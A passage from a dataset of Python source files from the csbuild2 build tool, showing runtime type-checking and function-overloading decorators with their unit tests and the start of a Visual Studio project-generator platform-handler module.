types.ClassType\n\nNOT_SET = object()\n\ndef TypeChecked(**argtypes):\n\t\"\"\"\n\t**Decorator**\n\tChecks argtypes passed to a function at runtime and throws an exception if an unexpected type is received.\n\n\tExample::\n\n\t\t@TypeChecked(var1=str, var2=int, var3=(int, float, str), _return=None)\n\t\tdef Func(var1, var2, var3):\n\t\t\t# Do stuff!\n\n\t:param argtypes: Keyword argument list of argtypes. Keywords must match the decorated function's parameters.\n\t\t\t\tThe special keyword *_return* designates the return type.\n\t\t\t\tEach parameter must either specify a type or a tuple of argtypes.\n\t\t\t\tTo explicitly accept all argtypes, pass arg=object\n\t:return: a type-checked wrapper for the function\n\t:rtype: function\n\t\"\"\"\n\twith perf_timer.PerfTimer(\"TypeChecked decorator\"):\n\t\targtypes = dict(**argtypes)\n\n\t\tdef _wrapOuter(oldFunc):\n\t\t\t\"\"\" Outer decorator wrapper - set up the inner decorator \"\"\"\n\t\t\twith perf_timer.PerfTimer(\"TypeChecked outer wrap\"):\n\t\t\t\t# co_varnames includes both parameters and locals - trim it to just parameters\n\t\t\t\tvarNames = oldFunc.__code__.co_varnames[0:oldFunc.__code__.co_argcount]\n\n\t\t\t\t# Check that all the types provided are actual types and that none of them reference nonexistent parameters\n\t\t\t\tfor name, typ in argtypes.items():\n\t\t\t\t\tif not isinstance(typ, (_typeType, _classType, tuple)):\n\t\t\t\t\t\traise TypeError(\"Parameters to TypeChecked must be type, or tuple of argtypes - not {}\".format(typ))\n\n\t\t\t\t\tif isinstance(typ, tuple):\n\t\t\t\t\t\tfor subtype in typ:\n\t\t\t\t\t\t\tif not isinstance(subtype, (_typeType, _classType)):\n\t\t\t\t\t\t\t\traise TypeError(\"Tuple parameters to TypeChecked must contain only argtypes - not {}\".format(subtype))\n\n\t\t\t\t\tif name == \"_return\":\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif name not in varNames:\n\t\t\t\t\t\traise TypeError(\"Function {} has no parameter named '{}'\".format(oldFunc.__name__, name))\n\n\t\t\t\t# Check that all the function's parameters are represented - for type checking, this is just a warning if they're not\n\t\t\t\tfor name in varNames:\n\t\t\t\t\tif name == \"self\":\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif name not in argtypes:\n\t\t\t\t\t\twarnings.warn(\"Function {}: Parameter '{}' has no type assigned (use 'object' to accept all argtypes)\".format(oldFunc.__name__, name))\n\n\t\t\t\toldFunc.__types__ = argtypes\n\t\t\t\toldFunc.__varNames__ = varNames\n\n\t\t\t\tdef _wrap(*args, **kwargs):\n\t\t\t\t\t\"\"\"\n\t\t\t\t\tInner wrapper - this function actually replaces the decorated function and is called every tim\n\t\t\t\t\tthe decorated function is called. It checks all the type arguments before calling the decorated\n\t\t\t\t\tfunction and raises an exception if they don't match.\n\t\t\t\t\t\"\"\"\n\t\t\t\t\twith perf_timer.PerfTimer(\"Type checking\"):\n\t\t\t\t\t\tfor i, name in enumerate(varNames):\n\t\t\t\t\t\t\targtype = argtypes.get(name, NOT_SET)\n\n\t\t\t\t\t\t\tif argtype is NOT_SET:\n\t\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\t\tif i < len(args):\n\t\t\t\t\t\t\t\telem = args[i]\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\telem = kwargs.get(name, NOT_SET)\n\n\t\t\t\t\t\t\tif elem != NOT_SET:\n\t\t\t\t\t\t\t\tif not isinstance(elem, argtype):\n\t\t\t\t\t\t\t\t\traise TypeError(\"Argument '{}' is type {}, expected {}\".format(name, elem.__class__, argtype))\n\n\t\t\t\t\tresult = oldFunc(*args, **kwargs)\n\n\t\t\t\t\twith perf_timer.PerfTimer(\"Type checking\"):\n\t\t\t\t\t\treturntype = argtypes.get('_return', NOT_SET)\n\t\t\t\t\t\tif returntype != NOT_SET:\n\t\t\t\t\t\t\tif not isinstance(result, returntype):\n\t\t\t\t\t\t\t\traise TypeError(\"Function {} returned invalid return type {}; expected {}\".format(oldFunc.__name__, type(result), returntype))\n\t\t\t\t\t\treturn result\n\t\t\t\treturn _wrap\n\t\treturn _wrapOuter\n\n\ndef Overload(**argtypes):\n\t\"\"\"\n\t**Decorator**\n\tAllows multiple definitions of the same function with different type signatures, and selects the best one\n\tat runtime based on the argtypes passed to it. All functions that are put up for selection MUST be decorated.\n\n\tExample::\n\n\t\t@Overload(var1=str, var2=int)\n\t\tdef Func2(var1, var2):\n\t\t\tprint(\"STRINT\", var1, var2)\n\n\t\t@Overload(var1=int, var2=str)\n\t\tdef Func2(var1, var2):\n\t\t\tprint(\"INTSTR\", var1, var2)\n\n\t\tFunc2(1, \"2\")\n\t\t>> INTSTR 1 2\n\t\tFunc2(\"1\", 2)\n\t\t>> STRINT 1 2\n\n\t:param argtypes: Keyword argument list of argtypes. Keywords must match the decorated function's parameters.\n\t\t\t\tThe special keyword *_return* designates the return type, which cannot be used for overloads,\n\t\t\t\tbut will be checked for correctness if specified.\n\t\t\t\tEach parameter may specify a type, a tuple of argtypes, or a value.\n\t\t\t\tTo explicitly accept all argtypes, pass arg=object.\n\t\t\t\tIf a value is passed rather than a type or tuple of argtypes, that value will provide an even more specific\n\t\t\t\toverload (for example, allowing the base case of a recursive function to be defined as an overload\n\t\t\t\tof the function that will be selected when, ex, param0=0)\n\t:return: A wrapper function that performs overload resolution and calls the correct function\n\t:rtype: function\n\t\"\"\"\n\twith perf_timer.PerfTimer(\"Overload decorator\"):\n\t\targtypes = dict(**argtypes)\n\n\t\tdef _wrapOuter(oldFunc):\n\t\t\t\"\"\" Outer decorator wrapper - set up the inner decorator \"\"\"\n\n\t\t\t# co_varnames includes both parameters and locals - trim it to just parameters\n\n\t\t\tvarNames = oldFunc.__code__.co_varnames[0:oldFunc.__code__.co_argcount]\n\n\t\t\t# Check that all the types provided are actual types and that none of them reference nonexistent parameters\n\t\t\tfor name, typ in argtypes.items():\n\t\t\t\tif isinstance(typ, tuple):\n\t\t\t\t\tfor subtype in typ:\n\t\t\t\t\t\tif not isinstance(subtype, (_typeType, _classType)):\n\t\t\t\t\t\t\traise TypeError(\"Tuple parameters to Overload must contain only argtypes - not {}\".format(subtype))\n\n\t\t\t\tif name == \"_return\":\n\t\t\t\t\tcontinue\n\t\t\t\tif name not in varNames:\n\t\t\t\t\traise TypeError(\"Overloaded function {} has no parameter {}\".format(oldFunc.__name__, name))\n\n\t\t\t# Check that all the function's parameters are represented - for overloads, error if they're not\n\t\t\tfor name in varNames:\n\t\t\t\tif name == \"self\":\n\t\t\t\t\tcontinue\n\t\t\t\tif name not in argtypes:\n\t\t\t\t\traise TypeError(\"Overloaded function {}: Parameter {} has no type assigned (use 'object' to accept all argtypes)\".format(oldFunc.__name__, name))\n\n\t\t\toldFunc.__types__ = argtypes\n\t\t\toldFunc.__varNames__ = varNames\n\n\t\t\tdef _wrap(*args, **kwargs):\n\t\t\t\t\"\"\"\n\t\t\t\tInner wrapper - this function actually replaces the decorated function and is called every tim\n\t\t\t\tthe decorated function is called. It goes through all the decorated functions with this function's\n\t\t\t\tname and picks the one that most closely matches the provided arguments, if any.\n\n\t\t\t\t\"Most closely\" here means that if one function takes int, and one takes 0, 0 more closely matches\n\t\t\t\t0 than int does.\n\t\t\t\t\"\"\"\n\n\t\t\t\t# Set up a list of prioritized functions, giving them a match closeness score\n\t\t\t\tprioritizedFuncs = {}\n\t\t\t\tfor func in Overload.funcs[oldFunc.__name__]:\n\t\t\t\t\tnumArgsGiven = len(args) + len(kwargs)\n\t\t\t\t\tnumArgsTaken = len(func.__varNames__)\n\t\t\t\t\tnumDefaults = len(func.__defaults__) if func.__defaults__ is not None else 0\n\t\t\t\t\t# If the number of arguments provided doesn't match the number of parameters to this overload,\n\t\t\t\t\t# skip it\n\t\t\t\t\tif numArgsGiven > numArgsTaken or numArgsGiven < (numArgsTaken - numDefaults):\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tdisqualified = False\n\t\t\t\t\tpriority = 0\n\t\t\t\t\tfor key in kwargs:\n\t\t\t\t\t\t# If there are any keyword arguments provided that aren't accepted by this overload, skip it\n\t\t\t\t\t\tif key not in func.__varNames__:\n\t\t\t\t\t\t\tdisqualified = True\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\tif disqualified:\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t# Quick eliminations out of the way, now the hard part... check all the types\n\t\t\t\t\tfor i, name in enumerate(func.__varNames__):\n\t\t\t\t\t\targtype = func.__types__.get(name)\n\n\t\t\t\t\t\t# pick the correct matching passed-in argument\n\t\t\t\t\t\tif i < len(args):\n\t\t\t\t\t\t\telem = args[i]\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\telem = kwargs.get(name, NOT_SET)\n\n\t\t\t\t\t\t# If the specified argument type is object, everything matches at the lowest priority\n\t\t\t\t\t\tif argtype is object:\n\t\t\t\t\t\t\tpriority += 1\n\t\t\t\t\t\telif isinstance(argtype, (_typeType, _classType)):\n\t\t\t\t\t\t\t# If the specified argument is a single type...\n\t\t\t\t\t\t\tif type(elem) is argtype: # pylint: disable=unidiomatic-typecheck\n\t\t\t\t\t\t\t\t# If the passed type is an exact match, this is a higher priority match\n\t\t\t\t\t\t\t\tpriority += 3\n\t\t\t\t\t\t\telif isinstance(elem, argtype):\n\t\t\t\t\t\t\t\t# Otherwise if the passed type's a subclass, middle priority\n\t\t\t\t\t\t\t\tpriority += 2\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t# If an element has been passed in that doesn't match the type, or no element's passed for\n\t\t\t\t\t\t\t\t# an argument with no default value, this overload is disqualified\n\t\t\t\t\t\t\t\tif elem is not NOT_SET or i < (numArgsTaken - numDefaults):\n\t\t\t\t\t\t\t\t\tdisqualified = True\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telif isinstance(argtype, tuple):\n\t\t\t\t\t\t\t# Otherwise this is a list of accepted types\n\t\t\t\t\t\t\tif isinstance(elem, argtype):\n\t\t\t\t\t\t\t\t# If the element matches, middle priority, same as subclass\n\t\t\t\t\t\t\t\tpriority += 2\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t# If an element has been passed in that doesn't match the type, or no element's passed for\n\t\t\t\t\t\t\t\t# an argument with no default value, this overload is disqualified\n\t\t\t\t\t\t\t\tif elem is not NOT_SET or i < (numArgsTaken - numDefaults):\n\t\t\t\t\t\t\t\t\tdisqualified = True\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t# If the specified type is a VALUE and not a type, and the element is equal to it, this is\n\t\t\t\t\t\t\t# TOP priority!\n\t\t\t\t\t\t\tif elem == argtype:\n\t\t\t\t\t\t\t\tpriority += 4\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tdisqualified = True\n\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\tif not disqualified:\n\t\t\t\t\t\t# If we're not disqualified and something else has the same total priority as this, flag it as ambiguous\n\t\t\t\t\t\t# Otherwise put it in the priority map\n\t\t\t\t\t\tif priority in prioritizedFuncs:\n\t\t\t\t\t\t\traise TypeError(\"Call to overloaded function {} is ambiguous: could not determine priority overload based on the provided arguments.\".format(oldFunc.__name__))\n\t\t\t\t\t\tprioritizedFuncs.update({ priority : func })\n\n\t\t\t\t# Now we've built our prioritized function list. If anything's in it at all, pick the one with the highest\n\t\t\t\t# priority and execute. Otherwise, flag a \"no viable overload\"\n\t\t\t\tif prioritizedFuncs:\n\t\t\t\t\torderedFuncs = sorted(prioritizedFuncs.items(), reverse=True)\n\n\t\t\t\t\t# Execute the function and check the return type\n\t\t\t\t\tresult = orderedFuncs[0][1](*args, **kwargs)\n\t\t\t\t\treturntype = argtypes.get('_return')\n\t\t\t\t\tif returntype != NOT_SET:\n\t\t\t\t\t\tif isinstance(returntype, (_typeType, _classType, tuple)):\n\t\t\t\t\t\t\tif not isinstance(result, returntype):\n\t\t\t\t\t\t\t\traise TypeError(\"Function {} returned invalid return type {}; expected {}\".format(oldFunc.__name__, type(result), returntype))\n\t\t\t\t\t\telif result != returntype:\n\t\t\t\t\t\t\traise TypeError(\"Function {} returned invalid return value {}; expected {}\".format(oldFunc.__name__, type(result), returntype))\n\t\t\t\t\treturn result\n\n\t\t\t\traise TypeError(\"No overload of {} found that matches the given arguments: {} {}\".format(oldFunc.__name__, args if args else \"\", kwargs if kwargs else \"\"))\n\n\t\t\t# Back to the outer wrapper now! Everything from here down only happens once per instance of the decorator.\n\t\t\t# Create a persistent overload list as a part of /this/ function\n\t\t\tif not hasattr(Overload, \"funcs\"):\n\t\t\t\tOverload.funcs = {}\n\n\t\t\t# Add this function to the list\n\t\t\tif oldFunc.__name__ in Overload.funcs:\n\t\t\t\tfuncs = Overload.funcs[oldFunc.__name__]\n\t\t\t\tnumArgsTaken = len(oldFunc.__varNames__)\n\t\t\t\tnumDefaults = len(oldFunc.__defaults__) if oldFunc.__defaults__ is not None else 0\n\t\t\t\tnumNonDefaulted = numArgsTaken - numDefaults\n\t\t\t\t# Iterate through the functions to find anything that has the same non-defaulted signature\n\t\t\t\tfor func in funcs:\n\t\t\t\t\tnumOtherArgsTaken = len(func.__varNames__)\n\t\t\t\t\tnumOtherDefaults = len(func.__defaults__) if func.__defaults__ is not None else 0\n\t\t\t\t\tnumOtherNonDefaulted = numOtherArgsTaken - numOtherDefaults\n\t\t\t\t\tif numNonDefaulted != numOtherNonDefaulted: # Different numnber of non-defaulted arguments, not a dupe\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tdifferentKeywords = False\n\t\t\t\t\tdifferentPositions = False\n\t\t\t\t\tdefaultsProblem = False\n\t\t\t\t\t# Determine if this function has either different keywords or the same keywords in different positions\n\t\t\t\t\tfor i, name in enumerate(func.__varNames__):\n\t\t\t\t\t\tif i >= numNonDefaulted:\n\t\t\t\t\t\t\tdefaultsProblem = True\n\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t\targType = func.__types__.get(name)\n\t\t\t\t\t\totherArgType = oldFunc.__types__.get(name)\n\t\t\t\t\t\tpositionalArgType = oldFunc.__types__.get(oldFunc.__varNames__[i]) if i < numArgsTaken else None\n\n\t\t\t\t\t\tif not isinstance(argType, (_typeType, _classType, tuple)):\n\t\t\t\t\t\t\targType = None\n\t\t\t\t\t\tif not isinstance(otherArgType, (_typeType, _classType, tuple)):\n\t\t\t\t\t\t\totherArgType = None\n\t\t\t\t\t\tif not isinstance(positionalArgType, (_typeType, _classType, tuple)):\n\t\t\t\t\t\t\tpositionalArgType = None\n\n\t\t\t\t\t\tif argType is not otherArgType:\n\t\t\t\t\t\t\tdifferentKeywords = True\n\t\t\t\t\t\tif positionalArgType is not argType:\n\t\t\t\t\t\t\tdifferentPositions = True\n\t\t\t\t\t\tif differentKeywords and differentPositions:\n\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t# If it has the same keywords in the same positions, start checking the types\n\t\t\t\t\tif not differentKeywords or not differentPositions:\n\t\t\t\t\t\tfor i, name in enumerate(oldFunc.__varNames__):\n\t\t\t\t\t\t\tif i >= numNonDefaulted:\n\t\t\t\t\t\t\t\tdefaultsProblem = True\n\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t\t\targType = func.__types__.get(name)\n\t\t\t\t\t\t\totherArgType = oldFunc.__types__.get(name)\n\t\t\t\t\t\t\tpositionalArgType = oldFunc.__types__.get(oldFunc.__varNames__[i]) if i < numArgsTaken else None\n\n\t\t\t\t\t\t\tif not isinstance(argType, (_typeType, _classType, tuple)):\n\t\t\t\t\t\t\t\targType = None\n\t\t\t\t\t\t\tif not isinstance(otherArgType, (_typeType, _classType, tuple)):\n\t\t\t\t\t\t\t\totherArgType = None\n\t\t\t\t\t\t\tif not isinstance(positionalArgType, (_typeType, _classType, tuple)):\n\t\t\t\t\t\t\t\tpositionalArgType = None\n\n\t\t\t\t\t\t\tif argType is not otherArgType:\n\t\t\t\t\t\t\t\tdifferentKeywords = True\n\t\t\t\t\t\t\tif positionalArgType is not argType:\n\t\t\t\t\t\t\t\tdifferentPositions = True\n\t\t\t\t\t\t\tif differentKeywords and differentPositions:\n\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\tdef _getName(val):\n\t\t\t\t\t\tif hasattr(val, \"__name__\"):\n\t\t\t\t\t\t\treturn val.__name__\n\t\t\t\t\t\treturn str(val)\n\n\t\t\t\t\t# Same positional arguments - error\n\t\t\t\t\tif not differentPositions:\n\t\t\t\t\t\tpositionalKeywordSignature = []\n\t\t\t\t\t\tfor i, name in enumerate(oldFunc.__varNames__):\n\t\t\t\t\t\t\tpositionalKeywordSignature.append({name : _getName(oldFunc.__types__.get(name))})\n\t\t\t\t\t\totherPositionalKeywordSignature = []\n\t\t\t\t\t\tfor i, name in enumerate(func.__varNames__):\n\t\t\t\t\t\t\totherPositionalKeywordSignature.append({name : _getName(func.__types__.get(name))})\n\t\t\t\t\t\tif defaultsProblem:\n\t\t\t\t\t\t\traise TypeError(\n\t\t\t\t\t\t\t\t\"Two or more overloads of {} share the same deduced positional signature except for defaulted parameters: \"\n\t\t\t\t\t\t\t\t\"{} and {}, with defaults starting at position {}: {} and {}\".format(\n\t\t\t\t\t\t\t\t\toldFunc.__name__,\n\t\t\t\t\t\t\t\t\tpositionalKeywordSignature,\n\t\t\t\t\t\t\t\t\totherPositionalKeywordSignature,\n\t\t\t\t\t\t\t\t\tnumNonDefaulted+1,\n\t\t\t\t\t\t\t\t\toldFunc.__defaults__,func.__defaults__\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t)\n\t\t\t\t\t\traise TypeError(\n\t\t\t\t\t\t\t\t\"Two or more overloads of {} share the same deduced positional signature: {} and {}\".format(\n\t\t\t\t\t\t\t\t\toldFunc.__name__,\n\t\t\t\t\t\t\t\t\tpositionalKeywordSignature,\n\t\t\t\t\t\t\t\t\totherPositionalKeywordSignature\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t)\n\n\t\t\t\t\t# Same keyword arguments - error\n\t\t\t\t\tif not differentKeywords:\n\t\t\t\t\t\tpositionalKeywordSignature = []\n\t\t\t\t\t\tfor i, name in enumerate(oldFunc.__varNames__):\n\t\t\t\t\t\t\tpositionalKeywordSignature.append({name : _getName(oldFunc.__types__.get(name))})\n\t\t\t\t\t\totherPositionalKeywordSignature = []\n\t\t\t\t\t\tfor i, name in enumerate(func.__varNames__):\n\t\t\t\t\t\t\totherPositionalKeywordSignature.append({name : _getName(func.__types__.get(name))})\n\t\t\t\t\t\tif defaultsProblem:\n\t\t\t\t\t\t\traise TypeError(\n\t\t\t\t\t\t\t\t\"Two or more overloads of {} share the same deduced keyword signature except for defaulted parameters: \"\n\t\t\t\t\t\t\t\t\"{} and {}, with defaults starting at position {}: {} and {}\".format(\n\t\t\t\t\t\t\t\t\toldFunc.__name__,\n\t\t\t\t\t\t\t\t\tpositionalKeywordSignature,\n\t\t\t\t\t\t\t\t\totherPositionalKeywordSignature,\n\t\t\t\t\t\t\t\t\tnumNonDefaulted+1,\n\t\t\t\t\t\t\t\t\toldFunc.__defaults__,\n\t\t\t\t\t\t\t\t\tfunc.__defaults__\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t)\n\t\t\t\t\t\traise TypeError(\n\t\t\t\t\t\t\t\"Two or more overloads of {} share the same deduced keyword signature: {} and {}\".format(\n\t\t\t\t\t\t\t\toldFunc.__name__,\n\t\t\t\t\t\t\t\tpositionalKeywordSignature,\n\t\t\t\t\t\t\t\totherPositionalKeywordSignature\n\t\t\t\t\t\t\t)\n\t\t\t\t\t\t)\n\t\t\t\tfuncs.append(oldFunc)\n\t\t\telse:\n\t\t\t\tOverload.funcs[oldFunc.__name__] = [oldFunc]\n\t\t\treturn _wrap\n\t\treturn _wrapOuter\n\n\ndef MetaClass(meta):\n\t\"\"\"\n\tDecorator to enable metaclasses in a way that's compliant with both python 2 and python 3\n\t(and arguably nicer and more readable than both)\n\n\t:param meta: Class to decorate\n\t:type meta: any\n\t:return: The class with metaclass added to it\n\t:rtype: type\n\t\"\"\"\n\tdef _wrap(cls):\n\t\treturn meta(cls.__name__, cls.__bases__, dict(cls.__dict__))\n\treturn _wrap\n\n### UNIT TESTS ###\n\nclass TestTypeCheck(testcase.TestCase):\n\t\"\"\"Test for the TypeChecked decorator\"\"\"\n\n\tdef setUp(self):\n\t\tOverload.funcs = {}\n\n\t# pylint: disable=unused-argument,unused-variable,no-self-use,invalid-name\n\tdef testSimpleTypeCheck(self):\n\t\t\"\"\"Simple test that type checks work for built-in types\"\"\"\n\t\t@TypeChecked(var1=int, var2=StrType)\n\t\tdef _simpleCheck(var1, var2):\n\t\t\tpass\n\n\t\tself.assertRaises(TypeError, _simpleCheck, \"1\", 2)\n\t\tself.assertRaises(TypeError, _simpleCheck, 1, 2)\n\t\tself.assertRaises(TypeError, _simpleCheck, \"1\", \"2\")\n\t\t_simpleCheck(1, \"2\")\n\n\tdef testComplexTypeCheck(self):\n\t\t\"\"\"Test that type checks work when the type specified is a tuple or abstract base class\"\"\"\n\t\timport numbers\n\t\t@TypeChecked(var1=(int, StrType), var2=numbers.Number)\n\t\tdef _tupleABCCheck(var1, var2):\n\t\t\tpass\n\n\t\t_tupleABCCheck(1, 2)\n\t\t_tupleABCCheck(\"1\", 2)\n\t\t_tupleABCCheck(1, 2.0)\n\t\t_tupleABCCheck(\"1\", 2.0)\n\n\tdef testParamNone(self):\n\t\t\"\"\"Test that the value None passed as a type raises an exception\"\"\"\n\t\twith self.assertRaises(TypeError):\n\t\t\t@TypeChecked(var1=None)\n\t\t\tdef _noneCheck(var1):\n\t\t\t\tpass\n\n\tdef testParamInt(self):\n\t\t\"\"\"Test that a non-type value other than None raises an exception\"\"\"\n\t\twith self.assertRaises(TypeError):\n\t\t\t@TypeChecked(var1=1)\n\t\t\tdef _noneCheck(var1):\n\t\t\t\tpass\n\n\tdef testOldAndNewClasses(self):\n\t\t\"\"\"Test that both old-style and new-style classes are accepted and work properly\"\"\"\n\t\tclass _oldClass: # pylint: disable=bad-option-value,old-style-class,no-init\n\t\t\tpass\n\n\t\tclass _newClass(object):\n\t\t\tpass\n\n\t\t@TypeChecked(var1=_oldClass, var2=_newClass)\n\t\tdef _classCheck(var1, var2):\n\t\t\tpass\n\n\t\t_classCheck(_oldClass(), _newClass())\n\t\tself.assertRaises(TypeError, _classCheck, _oldClass(), _oldClass())\n\t\tself.assertRaises(TypeError, _classCheck, _newClass(), _oldClass())\n\t\tself.assertRaises(TypeError, _classCheck, _newClass(), _newClass())\n\n\tdef testInvalidVar(self):\n\t\t\"\"\"Test that a variable name specified that doesn't exist raises an exception\"\"\"\n\t\twith self.assertRaises(TypeError):\n\t\t\t@TypeChecked(var1=int)\n\t\t\tdef _invalidVar(var2):\n\t\t\t\tpass\n\n\nclass TestOverload(testcase.TestCase):\n\t\"\"\"Test for the Overload decorator\"\"\"\n\n\t# pylint: disable=unused-argument,unused-variable,no-self-use,invalid-name,function-redefined\n\tdef testSimpleOverloads(self):\n\t\t\"\"\"Test that overloads work in the general case and non-matching argument sets throw exceptions\"\"\"\n\n\t\tclass _sharedLocals(object):\n\t\t\tintstr = False\n\t\t\tstrint = False\n\n\t\t@Overload(arg1=int, arg2=StrType)\n\t\tdef _simpleOverload(arg1, arg2):\n\t\t\t_sharedLocals.intstr = True\n\n\t\t@Overload(arg1=StrType, arg2=int)\n\t\tdef _simpleOverload(arg1, arg2):\n\t\t\t_sharedLocals.strint = True\n\n\t\t_simpleOverload(1, \"2\")\n\t\tself.assertTrue(_sharedLocals.intstr)\n\t\tself.assertFalse(_sharedLocals.strint)\n\t\t_sharedLocals.intstr = False\n\n\t\t_simpleOverload(\"1\", 2)\n\t\tself.assertTrue(_sharedLocals.strint)\n\t\tself.assertFalse(_sharedLocals.intstr)\n\n\t\twith self.assertRaises(TypeError):\n\t\t\t_simpleOverload(\"1\", \"2\")\n\n\t\twith self.assertRaises(TypeError):\n\t\t\t_simpleOverload(1, 2)\n\n\tdef testValueOverloads(self):\n\t\t\"\"\"Test that an overload on a value works and has higher priority than an overload on a type\"\"\"\n\n\t\tclass _sharedLocals(object):\n\t\t\tzero = False\n\t\t\tone = False\n\n\t\t@Overload(arg1=0)\n\t\tdef _simpleOverload(arg1):\n\t\t\t_sharedLocals.zero = True\n\n\t\t@Overload(arg1=int)\n\t\tdef _simpleOverload(arg1):\n\t\t\t_sharedLocals.one = True\n\n\t\t_simpleOverload(1)\n\t\tself.assertTrue(_sharedLocals.one)\n\t\tself.assertFalse(_sharedLocals.zero)\n\t\t_sharedLocals.one = False\n\n\t\t_simpleOverload(0)\n\t\tself.assertTrue(_sharedLocals.zero)\n\t\tself.assertFalse(_sharedLocals.one)\n\n\tdef testInvalidVar(self):\n\t\t\"\"\"Test that a variable name specified that doesn't exist raises an exception\"\"\"\n\t\twith self.assertRaises(TypeError):\n\t\t\t@Overload(var1=int)\n\t\t\tdef _invalidVar(var2):\n\t\t\t\tpass\n\n\tdef testDoubleOverload(self):\n\t\t\"\"\"Test that creating an overload with a signature that's already been made throws an exception\"\"\"\n\t\twith self.assertRaises(TypeError):\n\t\t\t@Overload(var1=int)\n\t\t\tdef _doubleOverload(var1):\n\t\t\t\tpass\n\t\t\t@Overload(var1=int)\n\t\t\tdef _doubleOverload(var1):\n\t\t\t\tpass\n" }, { "alpha_fraction": 0.7636623978614807, "alphanum_fraction": 0.7640438675880432, "avg_line_length": 33.04220962524414, "blob_id": "1d9b2bbbd85d38c3efb98db67a9ae94a48046ee5", "content_id": "9acd48059968a614a1528192982d75b866073d51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10485, "license_type": "no_license", "max_line_length": 144, "num_lines": 308, "path": "/csbuild/tools/project_generators/visual_studio/platform_handlers/__init__.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2018 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. package:: platform_handlers\n\t:synopsis: Built-in platform handlers for the Visual Studio project generator.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport abc\n\nfrom csbuild._utils.decorators import MetaClass\n\nfrom xml.etree import ElementTree as ET\n\ndef _ignore(_):\n\tpass\n\nclass VsInstallInfo(object):\n\t\"\"\"\n\tVisual Studio version data helper class.\n\n\t:ivar friendlyName: Friendly version name for logging.\n\t:type friendlyName: str\n\n\t:ivar fileVersion: File format version (e.g., \"Microsoft Visual Studio Solution File, Format Version XX.XX\" where \"XX.XX\" is the member value).\n\t:type fileVersion: str\n\n\t:ivar versionId: Version of Visual Studio the solution belongs to (e.g., \"# Visual Studio XX\" where \"XX\" is the member value).\n\t:type versionId: str\n\n\t:ivar toolsetVersion: Platform toolset version for the Visual Studio version.\n\t:type toolsetVersion: str\n\t\"\"\"\n\tdef __init__(self, friendlyName, fileVersion, versionId, toolsetVersion):\n\t\tself.friendlyName = friendlyName\n\t\tself.fileVersion = fileVersion\n\t\tself.versionId = versionId\n\t\tself.toolsetVersion = toolsetVersion\n\n\n@MetaClass(abc.ABCMeta)\nclass VsBasePlatformHandler(object):\n\t\"\"\"\n\tVisual Studio platform handler base class.\n\n\t:ivar buildSpec: Internal build specification being written.\n\t:type buildSpec: tuple[str, str, str]\n\n\t:ivar vsInstallInfo: Information relating to the selected version of Visual Studio.\n\t:type vsInstallInfo: csbuild.tools.project_generators.visual_studio.platform_handlers.VsInstallInfo\n\t\"\"\"\n\tdef __init__(self, buildSpec, vsInstallInfo):\n\t\tself.buildSpec = buildSpec\n\t\tself.vsInstallInfo = vsInstallInfo\n\n\t\tself._addXmlNode = ET.SubElement\n\n\t@staticmethod\n\tdef GetVisualStudioPlatformName(): # pylint: disable=redundant-returns-doc\n\t\t\"\"\"\n\t\tGet the name that is recognizeable by Visual Studio for the current platform.\n\n\t\t:return: Visual Studio platform name.\n\t\t:rtype: str\n\t\t\"\"\"\n\t\tpass\n\n\t@staticmethod\n\tdef GetOutputExtensionIfDebuggable(projectOutputType): # pylint: disable=redundant-returns-doc\n\t\t\"\"\"\n\t\tGet the file extension of the input project output type for the current platform.\n\t\tOnly applies to debuggable projects. Any other project types should return `None`.\n\n\t\t:param projectOutputType: Final output type of a project.\n\t\t:type projectOutputType: any\n\n\t\t:return: Application extension.\n\t\t:rtype: str or None\n\t\t\"\"\"\n\t\t_ignore(projectOutputType)\n\t\treturn None\n\n\t@staticmethod\n\tdef GetIntellisenseIncludeSearchPaths(project, buildSpec):\n\t\t\"\"\"\n\t\tGet a list of any platform-specific include search paths needed by intellisense.\n\n\t\t:param project: Visual Studio project data.\n\t\t:type project: 